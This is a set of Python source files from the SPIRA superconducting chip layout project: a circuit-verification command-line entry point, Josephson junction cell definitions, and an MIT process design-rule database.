configuration = toml_load(args.configuration)
try:
schema_validate(instance=configuration, schema=SCHEMA_CONFIG)
except SchemaValidationError as error:
print("ERROR: configuration file validation failed")
print(" reason: {}".format(error.message))
exit(-1)
mode = configuration["mode"]
if mode == "verify":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
verifier = Verifier(verify_configuration)
output = verifier.verify()
if output:
print("SUCCESS")
else:
print("FAILURE")
if output.failure_time is not None:
print(" TIME : {}".format(output.failure_time))
if output.failure_point is not None:
print(" POINT : {}".format(output.failure_point))
elif mode == "margin":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
margin_configuration = MarginAnalysisConfiguration.from_dict(
configuration.get("margin", {})
)
margin_parameters: Dict[str, MarginParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
margin_parameters[key] = MarginParameterConfiguration.from_dict(item)
margin_analysis = MarginAnalysis(verify_configuration, margin_configuration)
num_threads = min(2 * len(margin_parameters), cpu_count())
margin_analysis_parameters: Dict[str, float] = {}
for key, item in margin_parameters.items():
margin_analysis_parameters[key] = item.nominal
result = margin_analysis.analyse(margin_analysis_parameters, num_threads)
print_margin_analysis_result(
result,
left_size=margin_configuration.min_search,
right_size=margin_configuration.max_search,
)
elif mode == "yield":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
yield_configuration = YieldAnalysisConfiguration.from_dict(
configuration["yield"]
)
yield_parameters: Dict[str, YieldParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
yield_parameters[key] = YieldParameterConfiguration.from_dict(item)
num_samples = yield_configuration.num_samples
num_threads = min(num_samples, cpu_count())
yield_analysis = YieldAnalysis(verify_configuration, yield_parameters)
yield_analysis.sample(num_samples, num_threads)
print(
"Yield: {} / {} = {:.1f} %".format(
yield_analysis.num_success(),
yield_analysis.num_total(),
yield_analysis.percentage() * 100,
)
)
elif mode == "optimize":
verify_configuration = VerifyConfiguration.from_dict(configuration["verify"])
margin_configuration = MarginAnalysisConfiguration.from_dict(
configuration.get("margin", {})
)
optimize_configuration = OptimizeConfiguration.from_dict(
configuration["optimize"]
)
optimize_parameters: Dict[str, OptimizerParameterConfiguration] = {}
for key, item in configuration["parameters"].items():
optimize_parameters[key] = OptimizerParameterConfiguration.from_dict(item)
optimizer = Optimizer(
verify_configuration,
margin_configuration,
optimize_configuration,
optimize_parameters,
args.verbose
)
optimization_parameters: Dict[str, float] = {}
for key, item in optimize_parameters.items():
optimization_parameters[key] = item.nominal
point = optimizer.optimize(optimization_parameters)
output_file = optimize_configuration.output
if output_file is not None:
optimizer.margin_analysis_.verifier_.simulator_.write_file_with_updated_parameters(
output_file, point)
else:
assert False, "INTERNAL ERROR: UNREACHABLE CODE"
if __name__ == "__main__":
run()
``` |
{
"source": "JoeyDelp/spira",
"score": 2
} |
#### File: mit/devices/junction_expanded.py
```python
import numpy as np
import spira.all as spira
from spira.yevon.visualization import color
from spira.technologies.mit import devices as dev
from spira.technologies.mit.process.database import RDD
class MetalBlock(spira.Cell):
""" Place a metal layer around the defined contact layers. """
margin = spira.NumberParameter(default=0.0, doc='Margin value between metal layer and nearest contact layers.')
layer = spira.PhysicalLayerParameter(default=RDD.PLAYER.M6, doc='Metal layer to be wrapped around the cell bounding box.')
def create_elements(self, elems):
# cell = spira.Cell(elements=elems.flatten())
cell = spira.Cell(elements=elems)
bb = cell.bbox
margin = self.margin
p1 = [bb[0][0]-margin, bb[0][1]-margin]
p2 = [bb[1][0]+margin, bb[1][1]+margin]
alias = self.layer.layer.name
# alias = '{}_{}'.format(self.layer.layer.name, self.alias)
elems = pc.Rectangle(alias=alias, layer=self.layer, p1=p1, p2=p2)
return elems
class __Junction__(spira.Cell):
""" Base class for Junction PCell. """
radius = spira.FloatParameter()
width = spira.FloatParameter(doc='Shunt resistance width')
c5r = spira.Parameter(fdef_name='create_c5r')
class I5Contacts(__Junction__):
""" Cell that contains all the vias of the bottom halve of the Junction. """
i5 = spira.Parameter(fdef_name='create_i5')
i6 = spira.Parameter(fdef_name='create_i6')
sky_via = spira.BoolParameter(default=False)
def create_i5(self):
via = dev.ViaI5()
V = spira.SRef(via, midpoint=(0,0))
return V
def create_i6(self):
c = self.i5.midpoint
w = (self.i5.reference.width + 4*RDD.I6.I5_MIN_SURROUND)
via = dev.ViaI6(width=w, height=w)
V = spira.SRef(via, midpoint=c)
return V
def create_c5r(self):
via = dev.ViaC5RA(width=self.width)
V = spira.SRef(via)
V.connect(port=V.ports['R5_e0'], destination=self.i5.ports['M5_e2'])
return V
def create_elements(self, elems):
elems += self.i5
elems += self.c5r
if self.sky_via is True:
elems += self.i6
elems += MetalBlock(layer=RDD.PLAYER.M6).create_elements(elems)
return elems
def create_ports(self, ports):
ports += self.i5.ports['M5_e2']
ports += self.c5r.ports['R5_e2']
return ports
class J5Contacts(__Junction__):
""" Cell that contains all the vias of the top halve of the Junction. """
j5 = spira.Parameter(fdef_name='create_j5')
def create_j5(self):
jj = dev.JJ(width=2*self.radius)
D = spira.SRef(jj, midpoint=(0,0))
return D
def create_c5r(self):
via = dev.ViaC5RA(width=self.width)
V = spira.SRef(via)
V.connect(port=V.ports['R5_e0'], destination=self.j5.ports['M5_e0'])
return V
def create_elements(self, elems):
elems += self.j5
elems += self.c5r
elems += MetalBlock(layer=RDD.PLAYER.M6).create_elements(elems)
return elems
def create_ports(self, ports):
ports += self.j5.ports['M5_e0']
ports += self.c5r.ports['R5_e2']
for p in self.elements['M6'].ports:
ports += p.copy(name=p.name)
return ports
class Junction(spira.Circuit):
__name_prefix__ = 'Junction'
color = spira.ColorParameter(default=color.COLOR_PLUM, doc='The color of the Junction representative node in a graph network (netlist).')
text_type = spira.NumberParameter(default=91)
length = spira.NumberParameter(default=1, doc='Length of the shunt resistance.')
width = spira.NumberParameter(default=RDD.R5.MIN_SIZE, restriction=spira.RestrictRange(lower=RDD.R5.MIN_SIZE, upper=RDD.R5.MAX_WIDTH), doc='Width of the shunt resistance.')
radius = spira.NumberParameter(default=RDD.J5.MIN_SIZE, restriction=spira.RestrictRange(lower=RDD.J5.MIN_SIZE, upper=RDD.J5.MAX_SIZE), doc='Radius of the circular junction layer.')
i5 = spira.Parameter(fdef_name='create_i5_cell')
j5 = spira.Parameter(fdef_name='create_j5_cell')
gnd_via = spira.BoolParameter(default=False)
sky_via = spira.BoolParameter(default=False)
def create_i5_cell(self):
D = I5Contacts(width=self.width, radius=self.radius, sky_via=self.sky_via)
S = spira.SRef(D)
S.move(midpoint=S.ports['R5_e2'], destination=(0, self.length))
return S
def create_j5_cell(self):
D = J5Contacts(width=self.width, radius=self.radius)
S = spira.SRef(D)
S.move(midpoint=S.ports['R5_e2'], destination=(0,0))
return S
def create_elements(self, elems):
R = spira.Route(
port1=self.i5.ports['R5_e2'],
port2=self.j5.ports['R5_e2'],
width=self.width,
layer=RDD.PLAYER.R5
)
elems += spira.SRef(R)
elems += self.i5
elems += self.j5
m5 = MetalBlock(layer=RDD.PLAYER.M5, margin=0.1).create_elements(elems)
elems += m5
if self.gnd_via is True:
i4 = dev.ViaI4()
elems += spira.SRef(i4, midpoint=m5.center)
return elems
def create_ports(self, ports):
for p in self.j5.ports:
if p.name == 'M6_e1':
el = p.edgelayer.copy(datatype=199)
ports += p.copy(name='P2', text_type=self.text_type, edgelayer=el)
if p.name == 'M6_e3':
el = p.edgelayer.copy(datatype=199)
ports += p.copy(name='P1', text_type=self.text_type, edgelayer=el)
return ports
from spira.netex.containers import __CellContainer__
class Connector(__CellContainer__):
""" Contains the expanded cell for connection detection. """
def create_elements(self, elems):
elems = self.cell.elements
return elems
def create_ports(self, ports):
elems = self.cell.elements
# ports = elems[0].ports & elems[1]
# ports = elems[0].ports
for i in range(len(elems)):
for j in range(len(elems)):
if i != j:
e1 = elems[i]
e2 = elems[j]
if e1.layer == e2.layer:
if e1.layer.layer.number == 60:
pl = elems[i].ports & elems[j]
for p in pl:
ports += p
return ports
if __name__ == '__main__':
cell = spira.Cell(name='Junction', doc='Contains all the implemented junction devices.')
T = spira.Rotation(0)
j1 = Junction()
S = spira.SRef(j1, midpoint=(0, 0), transformation=T)
# D = S.expand_flat_copy()
# D.gdsii_output()
# connector = Connector(cell=D)
# # connector.ports
# connector.gdsii_output()
cell += S
cell.gdsii_output()
# j1 = Junction()
# cell += spira.SRef(j1, midpoint=(0, 0), transformation=T)
# j2 = Junction(length=1.5)
# cell += spira.SRef(j2, midpoint=(5, 0), transformation=T)
# j3 = Junction(width=1.2)
# cell += spira.SRef(j3, midpoint=(10, 0), transformation=T)
# j4 = Junction(radius=1.2)
# cell += spira.SRef(j4, midpoint=(15,0), transformation=T)
# j5 = Junction(gnd_via=True)
# cell += spira.SRef(j5, midpoint=(20,0), transformation=T)
# j6 = Junction(sky_via=True)
# cell += spira.SRef(j6, midpoint=(25,0), transformation=T)
# j7 = Junction(gnd_via=True, sky_via=True)
# cell += spira.SRef(j7, midpoint=(30,0), transformation=T)
# print(Junction.length.__doc__)
# print(Junction.width.__doc__)
# print(Junction.radius.__doc__)
# cell.gdsii_output()
```
#### File: mit/process/database.py
```python
from spira.yevon.process.all import *
from spira.yevon.process import get_rule_deck
RDD = get_rule_deck()
# --------------------------------- Metals --------------------------------------
RDD.L0 = ParameterDatabase()
RDD.L0.MIN_SIZE = 2.0
RDD.L0.MAX_WIDTH = 20.0
RDD.M0 = ParameterDatabase()
RDD.M0.MIN_SIZE = 0.5
RDD.M0.MAX_WIDTH = 20.0
RDD.M0.LAYER = 0.0
RDD.M0.MIN_DENSITY = 15.0
RDD.M0.MAX_DENSITY = 85.0
RDD.M1 = ParameterDatabase()
RDD.M1.MIN_SIZE = 0.5
RDD.M1.MAX_WIDTH = 20.0
RDD.M1.LAYER = 10.0
RDD.M1.MIN_SPACE_TO_M1 = 0.5
RDD.M1.MIN_DENSITY = 15.0
RDD.M1.MAX_DENSITY = 80.0
RDD.M2 = ParameterDatabase()
RDD.M2.MIN_SIZE = 0.35
RDD.M2.MAX_WIDTH = 20.0
RDD.M2.LAYER = 20.0
RDD.M2.MIN_SPACE_TO_M2 = 0.5
RDD.M2.MIN_DENSITY = 15.0
RDD.M2.MAX_DENSITY = 80
RDD.M3 = ParameterDatabase()
RDD.M3.MIN_SIZE = 0.35
RDD.M3.MAX_WIDTH = 20.0
RDD.M3.LAYER = 30.0
RDD.M3.MIN_SPACE_TO_M3 = 0.5
RDD.M3.MIN_DENSITY = 15.0
RDD.M3.MAX_DENSITY = 80.0
RDD.M4 = ParameterDatabase()
RDD.M4.MIN_SIZE = 0.35
RDD.M4.MAX_WIDTH = 20.0
RDD.M4.I4_MIN_SURROUND = 0.3
RDD.M4.LAYER = 40.0
RDD.M4.MIN_SPACE_TO_M4 = 0.5
RDD.M4.MIN_DENSITY = 35.0
RDD.M4.MAX_DENSITY = 85.0
RDD.M5 = ParameterDatabase()
RDD.M5.MIN_SIZE = 0.7
RDD.M5.MAX_WIDTH = 20.0
RDD.M5.J5_MIN_SURROUND = 0.5
RDD.M5.MIN_SURROUND_OF_I5 = 0.5
RDD.M5.LAYER = 50.0
RDD.M5.MIN_SPACE_TO_M5 = 1
RDD.M5.MIN_DENSITY = 35.0
RDD.M5.MAX_DENSITY = 85.0
RDD.M6 = ParameterDatabase()
RDD.M6.MIN_SIZE = 0.5
RDD.M6.MAX_WIDTH = 20.0
RDD.M6.SPACING = 0.7
RDD.M6.I6_MIN_SURROUND = 0.5
RDD.M6.LAYER = 60.0
RDD.M6.MIN_SPACE_TO_M6 = 0.7
RDD.M6.MIN_DENSITY = 35.0
RDD.M6.MAX_DENSITY = 85.0
RDD.M7 = ParameterDatabase()
RDD.M7.MIN_SIZE = 0.5
RDD.M7.MAX_WIDTH = 20.0
RDD.M7.LAYER = 70.0
RDD.M7.MIN_SPACE_TO_M7 = 0.7
RDD.M7.MIN_DENSITY = 35.0
RDD.M7.MAX_DENSITY = 85.0
RDD.M8 = ParameterDatabase()
RDD.M8.MIN_SIZE = 10.0
RDD.M8.LAYER = 80.0
RDD.M8.MIN_SPACE_TO_M8 = 10
RDD.R5 = ParameterDatabase()
RDD.R5.MIN_SIZE = 0.5
RDD.R5.MAX_WIDTH = 5.0
RDD.R5.J5_MIN_SPACING = 0.4
RDD.R5.C5R_MIN_SURROUND = 0.35
RDD.R5.LAYER = 52.0
RDD.R5.MIN_SPACE_TO_R5 = 0.5
RDD.R5.MIN_DENSITY = 0.0
RDD.R5.MAX_DENSITY = 25.0
# --------------------------------- Vias ----------------------------------------
RDD.C0 = ParameterDatabase()
RDD.C0.MIN_SIZE = 0.7
RDD.C0.MAX_SIZE = 1.0
RDD.C0.M5_METAL = 1.0
RDD.C0.MIN_DENSITY = 0.0
RDD.C0.MAX_DENSITY = 25.0
RDD.C0.LAYER = 4
RDD.I0 = ParameterDatabase()
RDD.I0.MIN_SIZE = 0.6
RDD.I0.MAX_SIZE = 1.2
RDD.I0.M5_METAL = 1.0
RDD.I0.MIN_DENSITY = 0.0
RDD.I0.MAX_DENSITY = 25.0
RDD.I0.LAYER = 2
RDD.I1 = ParameterDatabase()
RDD.I1.MIN_SIZE = 0.6
RDD.I1.MAX_SIZE = 1.2
RDD.I1.M5_METAL = 1.0
RDD.I1.MIN_SPACE_TO_I1 = 0.7
RDD.I1.MIN_DENSITY = 0.0
RDD.I1.MAX_DENSITY = 25.0
RDD.I1.LAYER = 11
RDD.I2 = ParameterDatabase()
RDD.I2.WIDTH = 0.5
RDD.I2.MIN_SIZE = 0.6
RDD.I2.MAX_SIZE = 1.2
RDD.I2.M5_METAL = 1.0
RDD.I2.MIN_SPACE_TO_I2 = 0.7
RDD.I2.MIN_DENSITY = 0.0
RDD.I2.MAX_DENSITY = 25.0
RDD.I2.LAYER = 21
RDD.I3 = ParameterDatabase()
RDD.I3.MIN_SIZE = 0.6
RDD.I3.MAX_SIZE = 1.2
RDD.I3.M5_METAL = 1.0
RDD.I3.MIN_SPACE_TO_I3 = 0.7
RDD.I3.MIN_DENSITY = 0.0
RDD.I3.MAX_DENSITY = 25.0
RDD.I3.LAYER = 31
RDD.I4 = ParameterDatabase()
RDD.I4.MIN_SIZE = 0.8
RDD.I4.MAX_SIZE = 1.2
RDD.I4.M5_MIN_SURROUND = 0.3
RDD.I4.LAYER = 41.0
RDD.I4.MIN_SPACE_TO_I4 = 1
RDD.I4.MIN_DENSITY = 0
RDD.I4.MAX_DENSITY = 25.0
RDD.I5 = ParameterDatabase()
RDD.I5.MIN_SIZE = 0.7
RDD.I5.MAX_SIZE = 1.2
RDD.I5.M5_METAL = 1.0
RDD.I5.R5_MIN_SPACING = 0.5
RDD.I5.MIN_SURROUND_BY_M6 = 0.35
RDD.I5.LAYER = 54.0
RDD.I5.MIN_SPACE_TO_I5 = 0.7
RDD.I5.MIN_DENSITY = 0.0
RDD.I5.MAX_DENSITY = 25.0
RDD.J5 = ParameterDatabase()
RDD.J5.MIN_SIZE = 0.7
RDD.J5.MAX_SIZE = 3.0
RDD.J5.M5_METAL = 1.0
RDD.J5.M4_MIN_OVERLAP = 0.5
RDD.J5.C5J_MIN_SURROUND = 0.1
RDD.J5.I5_MIN_SPACING = 0.7
RDD.J5.LAYER = 51.0
RDD.J5.MIN_SPACE_TO_J5 = 1.1
RDD.J5.MIN_DENSITY = 5.0
RDD.J5.MAX_DENSITY = 20.0
RDD.I6 = ParameterDatabase()
RDD.I6.MIN_SIZE = 0.7
RDD.I6.M5_METAL = 1.0
RDD.I6.I5_MIN_SURROUND = 0.3
RDD.I6.M7_MIN_SURROUND = 0.35
RDD.I6.LAYER = 61.0
RDD.I6.MIN_SPACE_TO_I6 = 0.7
RDD.I7 = ParameterDatabase()
RDD.I7.MIN_SIZE = 5.0
RDD.I7.M5_METAL = 1.0
RDD.I7.MIN_SPACE_TO_I7 = 3
RDD.C5J = ParameterDatabase()
RDD.C5J.MIN_SIZE = 0.5
RDD.C5J.M6_MIN_SURROUND = 0.35
RDD.C5R = ParameterDatabase()
RDD.C5R.MIN_SIZE = 0.8
RDD.C5R.M5_METAL = 1.0
RDD.C5R.R5_MAX_SIDE_SURROUND = 0.2
RDD.C5R.R5_MIN_SURROUND = 0.35
RDD.C5R.M6_MIN_SURROUND = 0.35
RDD.C5R.I6_MIN_SPACE = 0.5
# ------------------------------- Physical Layers -------------------------------
RDD.PLAYER.M0 = PhysicalLayerDatabase()
RDD.PLAYER.M1 = PhysicalLayerDatabase()
RDD.PLAYER.M2 = PhysicalLayerDatabase()
RDD.PLAYER.M3 = PhysicalLayerDatabase()
RDD.PLAYER.M4 = PhysicalLayerDatabase()
RDD.PLAYER.M5 = PhysicalLayerDatabase()
RDD.PLAYER.M6 = PhysicalLayerDatabase()
RDD.PLAYER.M7 = PhysicalLayerDatabase()
RDD.PLAYER.R5 = PhysicalLayerDatabase()
RDD.PLAYER.METAL = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.BBOX = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.PORT = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.IXPORT = PhysicalLayer(process=RDD.PROCESS.PORT, purpose=RDD.PURPOSE.PORT.IXPORT)
RDD.PLAYER.M0.METAL = PhysicalLayer(name='M0', process=RDD.PROCESS.M0, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M1.METAL = PhysicalLayer(name='M1', process=RDD.PROCESS.M1, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M2.METAL = PhysicalLayer(name='M2', process=RDD.PROCESS.M2, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M3.METAL = PhysicalLayer(name='M3', process=RDD.PROCESS.M3, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M4.GND = PhysicalLayer(name='M4', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.GROUND)
RDD.PLAYER.M4.HOLE = PhysicalLayer(name='M4_HOLE', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M4.BBOX = PhysicalLayer(name='M4_BBOX', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M4.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M4.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M4.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M4.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M4.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M5.METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M5.DEVICE_METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M5.CIRCUIT_METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M5.ROUTE = PhysicalLayer(name='M5_ROUTE', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M5.HOLE = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M5.BBOX = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M5.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M5.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.M5.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.M5.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.M5.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M5.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M5.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M5.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M5.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.M6.METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M6.DEVICE_METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M6.CIRCUIT_METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M6.ROUTE = PhysicalLayer(name='M6_ROUTE', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M6.HOLE = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M6.BBOX = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M6.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M6.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M6.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.M6.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.M6.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.M6.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M6.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M6.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M6.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M6.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.M7.METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M7.DEVICE_METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M7.CIRCUIT_METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M7.ROUTE = PhysicalLayer(name='M7_ROUTE', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M7.HOLE = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M7.BBOX = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M7.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M7.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M7.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M7.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M7.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M7.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M7.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.R5.METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.R5.DEVICE_METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.R5.CIRCUIT_METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.R5.ROUTE = PhysicalLayer(name='R5_ROUTE', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.R5.HOLE = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.R5.BBOX = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.R5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.R5.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.R5.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.R5.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.R5.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.R5.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.R5.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.R5.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.R5.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.R5.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
# ------------------------------- Derived Layers ----------------------------------
RDD.PLAYER.R5.EDGE_CONNECTED = RDD.PLAYER.R5.METAL & RDD.PLAYER.R5.OUTSIDE_EDGE_DISABLED
RDD.PLAYER.M5.EDGE_CONNECTED = RDD.PLAYER.M5.METAL & RDD.PLAYER.M5.OUTSIDE_EDGE_DISABLED
RDD.PLAYER.M6.EDGE_CONNECTED = RDD.PLAYER.M6.METAL & RDD.PLAYER.M6.OUTSIDE_EDGE_DISABLED
# ------------------------------- Physical Contacts ----------------------------------
RDD.PLAYER.J5 = PhysicalLayerDatabase()
RDD.PLAYER.C5J = PhysicalLayerDatabase()
RDD.PLAYER.C5R = PhysicalLayerDatabase()
RDD.PLAYER.I0 = PhysicalLayerDatabase()
RDD.PLAYER.I1 = PhysicalLayerDatabase()
RDD.PLAYER.I2 = PhysicalLayerDatabase()
RDD.PLAYER.I3 = PhysicalLayerDatabase()
RDD.PLAYER.I4 = PhysicalLayerDatabase()
RDD.PLAYER.I5 = PhysicalLayerDatabase()
RDD.PLAYER.I6 = PhysicalLayerDatabase()
